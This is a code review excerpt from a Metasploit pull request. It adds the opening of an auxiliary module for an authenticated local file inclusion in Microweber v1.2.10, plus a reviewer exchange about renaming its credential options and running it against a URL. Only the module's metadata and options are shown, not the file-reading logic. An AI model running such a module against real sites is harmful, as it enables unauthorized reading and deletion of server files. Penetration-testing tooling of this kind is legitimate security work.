modules/auxiliary/gather/microweber_lfi.rb

```diff
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microweber v1.2.10 Local File Inclusion (Authenticated)',
+        'Description' => %q{
+          Microweber v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
+          Upload function may delete the local file if the web service user has access.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Talha Karakumru <talhakarakumru[at]gmail.com>'
+        ],
+        'References' => [
+          ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/']
+        ],
+        'Notes' => {
+          'SideEffects' => [ 'ARTIFACTS_ON_DISK', 'IOC_IN_LOGS' ],
+          'Reliability' => [ 'REPEATABLE_SESSION' ],
+          'Stability' => [ 'OS_RESOURCE_LOSS' ]
+        },
+        'Targets' => [
+          [ 'Microweber v1.2.10', {} ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2022-01-30'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
+        OptString.new('ADMIN_USER', [true, 'The admin\'s username for Microweber']),
+        OptString.new('ADMIN_PASS', [true, 'The admin\'s password for Microweber']),
```

Comment:
I believe if we rename these fields to `USERNAME` and `PASSWORD` then the module should work with this syntax:

```
use auxiliary/gather/microweber_lfi.rb
run http://user:pass@127.0.0.1
```

https://rapid7.github.io/metasploit-framework/docs/using-metasploit/basics/using-metasploit.html#http-examples

Reply:
Thanks I fixed it. You can now use `run http://user:pass@127.0.0.1` to run the module.